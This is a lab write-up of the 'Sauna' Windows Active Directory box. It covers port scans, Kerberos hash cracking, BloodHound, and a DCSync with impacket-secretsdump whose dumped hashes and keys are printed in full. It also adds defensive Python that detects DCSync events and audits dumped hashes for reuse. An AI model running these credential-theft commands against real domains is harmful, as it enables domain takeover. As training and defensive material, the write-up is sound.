Sauna

Operating system   Difficulty   Release date        Creator
Windows            Easy         15 February 2020    egotisticalSW

Port scan

nmap -sS -p- --open -Pn -n --min-rate 5000 -oG openPorts -vvv 10.10.10.175
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-27 19:45 -03
Initiating SYN Stealth Scan at 19:45
Scanning 10.10.10.175 [65535 ports]
Discovered open port 135/tcp on 10.10.10.175
Discovered open port 80/tcp on 10.10.10.175
Discovered open port 53/tcp on 10.10.10.175
Discovered open port 139/tcp on 10.10.10.175
Discovered open port 445/tcp on 10.10.10.175
Discovered open port 49696/tcp on 10.10.10.175
Discovered open port 49673/tcp on 10.10.10.175
Discovered open port 49668/tcp on 10.10.10.175
Discovered open port 9389/tcp on 10.10.10.175
Discovered open port 49689/tcp on 10.10.10.175
Discovered open port 49677/tcp on 10.10.10.175
Discovered open port 389/tcp on 10.10.10.175
Discovered open port 3268/tcp on 10.10.10.175
Discovered open port 49674/tcp on 10.10.10.175
Discovered open port 5985/tcp on 10.10.10.175
Discovered open port 88/tcp on 10.10.10.175
Discovered open port 593/tcp on 10.10.10.175
Discovered open port 464/tcp on 10.10.10.175
Discovered open port 636/tcp on 10.10.10.175
Discovered open port 3269/tcp on 10.10.10.175
Completed SYN Stealth Scan at 19:45, 41.26s elapsed (65535 total ports)
Nmap scan report for 10.10.10.175
Host is up, received user-set (0.34s latency).
Scanned at 2025-04-27 19:45:10 -03 for 41s
Not shown: 65515 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE          REASON
53/tcp    open  domain           syn-ack ttl 127
80/tcp    open  http             syn-ack ttl 127
88/tcp    open  kerberos-sec     syn-ack ttl 127
135/tcp   open  msrpc            syn-ack ttl 127
139/tcp   open  netbios-ssn      syn-ack ttl 127
389/tcp   open  ldap             syn-ack ttl 127
445/tcp   open  microsoft-ds     syn-ack ttl 127
464/tcp   open  kpasswd5         syn-ack ttl 127
593/tcp   open  http-rpc-epmap   syn-ack ttl 127
636/tcp   open  ldapssl          syn-ack ttl 127
3268/tcp  open  globalcatLDAP    syn-ack ttl 127
3269/tcp  open  globalcatLDAPssl syn-ack ttl 127
5985/tcp  open  wsman            syn-ack ttl 127
9389/tcp  open  adws             syn-ack ttl 127
49668/tcp open  unknown          syn-ack ttl 127
49673/tcp open  unknown          syn-ack ttl 127
49674/tcp open  unknown          syn-ack ttl 127
49677/tcp open  unknown          syn-ack ttl 127
49689/tcp open  unknown          syn-ack ttl 127
49696/tcp open  unknown          syn-ack ttl 127

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 41.60 seconds
           Raw packets sent: 196589 (8.650MB) | Rcvd: 47 (2.068KB)

Service and version enumeration

nmap -sCV -p53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49668,49673,49674,49677,49689,49696 -oN servicesScan 10.10.10.175 -vvv
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-27 19:45 -03
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 19:45
Completed NSE at 19:45, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 19:45
Completed NSE at 19:45, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 19:45
Completed NSE at 19:45, 0.00s elapsed
Initiating Ping Scan at 19:45
Scanning 10.10.10.175 [4 ports]
Completed Ping Scan at 19:45, 0.34s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 19:45
Completed Parallel DNS resolution of 1 host. at 19:45, 0.00s elapsed
DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 2, OK: 1, NX: 0, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 19:45
Scanning 10.10.10.175 (10.10.10.175) [20 ports]
Discovered open port 80/tcp on 10.10.10.175
Discovered open port 135/tcp on 10.10.10.175
Discovered open port 53/tcp on 10.10.10.175
Discovered open port 445/tcp on 10.10.10.175
Discovered open port 139/tcp on 10.10.10.175
Discovered open port 5985/tcp on 10.10.10.175
Discovered open port 88/tcp on 10.10.10.175
Discovered open port 593/tcp on 10.10.10.175
Discovered open port 464/tcp on 10.10.10.175
Discovered open port 389/tcp on 10.10.10.175
Discovered open port 49673/tcp on 10.10.10.175
Discovered open port 49677/tcp on 10.10.10.175
Discovered open port 3268/tcp on 10.10.10.175
Discovered open port 49668/tcp on 10.10.10.175
Discovered open port 9389/tcp on 10.10.10.175
Discovered open port 3269/tcp on 10.10.10.175
Discovered open port 49696/tcp on 10.10.10.175
Discovered open port 636/tcp on 10.10.10.175
Discovered open port 49689/tcp on 10.10.10.175
Discovered open port 49674/tcp on 10.10.10.175
Completed SYN Stealth Scan at 19:46, 0.54s elapsed (20 total ports)
Initiating Service scan at 19:46
Scanning 20 services on 10.10.10.175 (10.10.10.175)
Warning: Hit PCRE_ERROR_MATCHLIMIT when probing for service http with the regex '^HTTP/1\.1 \d\d\d (?:[^\r\n]*\r\n(?!\r\n))*?.*\r\nServer: Virata-EmWeb/R([\d_]+)\r\nContent-Type: text/html; ?charset=UTF-8\r\nExpires: .*<title>HP (Color |)LaserJet ([\w._ -]+)&nbsp;&nbsp;&nbsp;'
Completed Service scan at 19:46, 58.25s elapsed (20 services on 1 host)
NSE: Script scanning 10.10.10.175.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 19:46
NSE Timing: About 99.96% done; ETC: 19:47 (0:00:00 remaining)
Completed NSE at 19:47, 41.64s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 19:47
Completed NSE at 19:47, 7.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 19:47
Completed NSE at 19:47, 0.00s elapsed
Nmap scan report for 10.10.10.175 (10.10.10.175)
Host is up, received echo-reply ttl 127 (0.26s latency).
Scanned at 2025-04-27 19:45:59 -03 for 108s

PORT      STATE SERVICE       REASON          VERSION
53/tcp    open  domain        syn-ack ttl 127 Simple DNS Plus
80/tcp    open  http          syn-ack ttl 127 Microsoft IIS httpd 10.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Egotistical Bank :: Home
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-04-28 05:46:09Z)
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack ttl 127
464/tcp   open  kpasswd5?     syn-ack ttl 127
593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack ttl 127
3268/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack ttl 127
5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        syn-ack ttl 127 .NET Message Framing
49668/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49673/tcp open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49677/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49689/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49696/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-04-28T05:47:02
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: 7h00m01s
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 35558/tcp): CLEAN (Timeout)
|   Check 2 (port 21516/tcp): CLEAN (Timeout)
|   Check 3 (port 57297/udp): CLEAN (Timeout)
|   Check 4 (port 34032/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 19:47
Completed NSE at 19:47, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 19:47
Completed NSE at 19:47, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 19:47
Completed NSE at 19:47, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 108.37 seconds
           Raw packets sent: 24 (1.032KB) | Rcvd: 21 (908B)

Initial exploitation

echo '10.10.10.175 EGOTISTICAL-BANK.LOCAL' >> /etc/hosts

HTTP 80

On the website we find several names, which we can use to build a list of possible users.

We can use this script to generate a user list.

hashcat -m 18200 fsmith.asrep /usr/share/wordlists/rockyou.txt

hashcat -m 13100 hsmith.kerberoast /usr/share/wordlists/rockyou.txt

Bloodhound

bloodhound-python -u 'fsmith' -p 'Thestrokes23' -d egotistical-bank.local -ns 10.10.10.175 --zip -c All

Privilege escalation

DCSync

We abuse DCSync to dump the hashes from the AD database.
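
From the defender's side, a DCSync is visible on the domain controller: the requester must hold the DS-Replication-Get-Changes extended rights on the domain object, and when those control-access rights are audited the DC writes Security event 4662 listing the right GUIDs in its Properties field. The following detection logic is an added example for this writeup, not code from the original page nor from impacket. The account names, the DC allow-list (SAUNA$ plus an assumed second DC, DC02$) and the event records are constructed; the replication-right GUIDs are the fixed values from the AD schema.

```python
"""Detect DCSync-style replication requests in Windows Security event 4662.

Added example for this writeup; not part of the original page nor of
impacket. secretsdump's "DRSUAPI method" is a DCSync: the caller asks the DC
to replicate directory secrets. A SACL auditing the replication control-access
rights makes the DC log event 4662 whose Properties field lists the right
GUIDs. Account names, allow-list and events below are constructed.
"""
import re

# Extended-right GUIDs as defined in the AD schema; any of them in a 4662
# Properties field means a replication request was authorised.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

# Accounts that legitimately replicate: DC machine accounts (in real estates
# also e.g. an Azure AD Connect service account). Constructed allow-list.
ALLOWED_REPLICATORS = {"SAUNA$", "DC02$"}

GUID_RE = re.compile(
    r"([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})", re.I)


def replication_rights(event):
    """Return the names of replication rights referenced by one 4662 event."""
    if event.get("EventID") != 4662:
        return []
    # AccessMask 0x100 is "Control Access", which extended rights fall under.
    if event.get("AccessMask") != "0x100":
        return []
    guids = {g.lower() for g in GUID_RE.findall(event.get("Properties", ""))}
    return sorted(REPLICATION_RIGHTS[g] for g in guids if g in REPLICATION_RIGHTS)


def suspicious_replication(events, allowed=ALLOWED_REPLICATORS):
    """Flag replication requests whose subject is not an allow-listed DC."""
    allowed_upper = {a.upper() for a in allowed}
    hits = []
    for e in events:
        rights = replication_rights(e)
        if not rights:
            continue
        subject = e["SubjectUserName"]
        if subject.upper() in allowed_upper:
            continue
        hits.append({"time": e["TimeCreated"], "subject": subject,
                     "domain": e["SubjectDomainName"], "rights": rights})
    return hits


# Constructed 4662 records, already split into fields the way a SIEM presents them.
SAMPLE_EVENTS = [
    {   # DC-to-DC replication: expected, subject is allow-listed
        "TimeCreated": "2025-04-28T05:40:11Z", "EventID": 4662, "AccessMask": "0x100",
        "SubjectUserName": "DC02$", "SubjectDomainName": "EGOTISTICAL-BANK",
        "Properties": "%%7688\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"
                      "\n\t{19195a5b-6da0-11d0-afd3-00c04fd930c9}",
    },
    {   # a user reading an object: not a control-access right, ignored
        "TimeCreated": "2025-04-28T05:45:02Z", "EventID": 4662, "AccessMask": "0x10",
        "SubjectUserName": "fsmith", "SubjectDomainName": "EGOTISTICAL-BANK",
        "Properties": "%%7683\n\t{bf967aba-0de6-11d0-a285-00aa003049e2}",
    },
    {   # a service account pulling all secrets: the DCSync performed above
        "TimeCreated": "2025-04-28T05:47:30Z", "EventID": 4662, "AccessMask": "0x100",
        "SubjectUserName": "svc_loanmgr", "SubjectDomainName": "EGOTISTICAL-BANK",
        "Properties": "%%7688\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"
                      "\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"
                      "\n\t{19195a5b-6da0-11d0-afd3-00c04fd930c9}",
    },
]

if __name__ == "__main__":
    for hit in suspicious_replication(SAMPLE_EVENTS):
        print(f"{hit['time']} {hit['domain']}\\{hit['subject']} "
              f"requested {', '.join(hit['rights'])}")
```

The allow-list is the weak point of this rule: keep it short and reviewed, because a non-DC account with these rights (here svc_loanmgr) is exactly what BloodHound surfaces as a DCSync path, and removing the right is the fix rather than widening the list.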

impacket-secretsdump egotistical-bank.local/svc_loanmgr:Moneymakestheworldgoround\!@10.10.10.175
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:e8c2f33115926459120e0a7cbfa6f255:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:42ee4a7abee32410f470fed37ae9660535ac56eeb73928ec783b015d623fc657
Administrator:aes128-cts-hmac-sha1-96:a9f3769c592a8a231c3c972c4050be4e
Administrator:des-cbc-md5:fb8f321c64cea87f
krbtgt:aes256-cts-hmac-sha1-96:83c18194bf8bd3949d4d0d94584b868b9d5f2a54d3d6f3012fe0921585519f24
krbtgt:aes128-cts-hmac-sha1-96:c824894df4c4c621394c079b42032fa9
krbtgt:des-cbc-md5:c170d5dc3edfc1d9
EGOTISTICAL-BANK.LOCAL\HSmith:aes256-cts-hmac-sha1-96:5875ff00ac5e82869de5143417dc51e2a7acefae665f50ed840a112f15963324
EGOTISTICAL-BANK.LOCAL\HSmith:aes128-cts-hmac-sha1-96:909929b037d273e6a8828c362faa59e9
EGOTISTICAL-BANK.LOCAL\HSmith:des-cbc-md5:1c73b99168d3f8c7
EGOTISTICAL-BANK.LOCAL\FSmith:aes256-cts-hmac-sha1-96:8bb69cf20ac8e4dddb4b8065d6d622ec805848922026586878422af67ebd61e2
EGOTISTICAL-BANK.LOCAL\FSmith:aes128-cts-hmac-sha1-96:6c6b07440ed43f8d15e671846d5b843b
EGOTISTICAL-BANK.LOCAL\FSmith:des-cbc-md5:b50e02ab0d85f76b
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes256-cts-hmac-sha1-96:6f7fd4e71acd990a534bf98df1cb8be43cb476b00a8b4495e2538cff2efaacba
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes128-cts-hmac-sha1-96:8ea32a31a1e22cb272870d79ca6d972c
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:des-cbc-md5:2a896d16c28cf4a2
SAUNA$:aes256-cts-hmac-sha1-96:d927ded149964b0408f0a4b6d82a89141427bd04e0771a303adff81391f9a33a
SAUNA$:aes128-cts-hmac-sha1-96:9574e71cb84668b6610998dc59a50803
SAUNA$:des-cbc-md5:b646158af7ad0da7
[*] Cleaning up...
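
A dump like the one above is also what a defender gets from an authorised NTDS assessment, and two things in it deserve a second look: HSmith and FSmith share the same NT hash (same password), and Guest carries the hash of the empty password. The following parser and checks are an added example for this writeup, not code from the original page nor from impacket; the sample input is copied from the dump above, and the empty-LM and empty-NT marker hashes are the well-known constants.

```python
"""Audit a secretsdump NTDS dump for credential-hygiene findings.

Added example for this writeup; not part of the page nor of impacket.
It parses the domain\\user:rid:lmhash:nthash::: lines that secretsdump prints
and reports accounts with an empty password, accounts that still store an LM
hash, and groups of accounts sharing one NT hash (password reuse).
"""
import re
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM field when no LM hash is stored
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash (MD4) of the empty password

# "domain\user" or "user", RID, LM hash, NT hash and the three trailing colons.
DUMP_LINE = re.compile(
    r"^(?P<user>[^:\s]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$",
    re.I)


def parse_dump(text):
    """Keep only hash lines; status lines and Kerberos key lines are skipped."""
    entries = []
    for line in text.splitlines():
        m = DUMP_LINE.match(line.strip())
        if not m:
            continue
        d = m.groupdict()
        d["rid"] = int(d["rid"])
        d["lm"], d["nt"] = d["lm"].lower(), d["nt"].lower()
        entries.append(d)
    return entries


def audit(entries):
    """Group by NT hash and return the three findings as plain lists/dicts."""
    by_nt = defaultdict(list)
    for e in entries:
        by_nt[e["nt"]].append(e["user"])
    return {
        "empty_password": [e["user"] for e in entries if e["nt"] == EMPTY_NT],
        "lm_hash_present": [e["user"] for e in entries if e["lm"] != EMPTY_LM],
        # the empty-password hash is reported separately, not as "reuse"
        "shared_nt_hash": {nt: users for nt, users in by_nt.items()
                           if len(users) > 1 and nt != EMPTY_NT},
    }


# Sample input: the secretsdump output shown above, including a status line
# and one Kerberos key line to show that the parser ignores them.
SAMPLE_DUMP = r"""
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:e8c2f33115926459120e0a7cbfa6f255:::
Administrator:aes256-cts-hmac-sha1-96:42ee4a7abee32410f470fed37ae9660535ac56eeb73928ec783b015d623fc657
"""

if __name__ == "__main__":
    findings = audit(parse_dump(SAMPLE_DUMP))
    for name, value in findings.items():
        print(f"{name}: {value}")
```

Cross-check the empty-password list against userAccountControl before acting on it: a disabled built-in such as Guest is expected there, while an enabled account is not. Shared NT hashes are the more useful finding, since cracking one password (as done with hashcat above) gives every account in that group.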

We connect to the system as the Administrator user by doing a Pass the Hash.
